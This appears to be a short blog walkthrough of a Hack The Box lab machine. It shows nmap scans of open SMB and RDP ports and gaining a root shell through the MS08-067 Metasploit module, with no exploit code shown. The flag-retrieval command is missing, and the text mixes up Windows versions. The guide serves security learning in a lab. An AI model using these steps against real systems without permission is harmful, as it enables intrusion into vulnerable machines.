Note: If following along, this guide assumes that the reader has set up a Kali Linux installation with all default tools, and is connected to the HTB network with the proper OpenVPN configurations.
Step by Step
As always, we’ll start with a standard “Widescan”:
nmap -p- -o widescan.txt -T5 10.10.10.4
Ports 139 and 445 are open, which means we’ve got Samba. Not too surprising for a windows machine. Port 3389 is a little less common, being the port for RDP on windows. With this, I’ll take my found ports and run my Deepscan:
nmap -p 139,445,3389 -o deepscan.txt -A 10.10.10.4
There’s a lot of information here: The box is running Windows XP, an old OS with lots of discovered vulns. Our samba version also appears to be 2, which is old. Knowing this, I’ll google “Windows 2000 exploit”, to which the first result is the MS08-067 exploit. Luckily enough, there’s a metasploit module that makes exploitation pretty easy. All we do is look for the exploit, set the options right, and we open a root shell.
The exploit needed to be run twice, for whatever reason- just happens that way sometimes.
Since this exploit just so happens to drop is into a root shell, no further privilege escalation is required, and our work is done. The last thing to do is grab the flags, which can be done with just
Thanks for reading my guide! I hope it was helpful. There’s more Hack the Box guides under the “HTB guides” menu (brilliant design on my part, I know), and some other projects / blog posts if you’re interested in learning security like I am.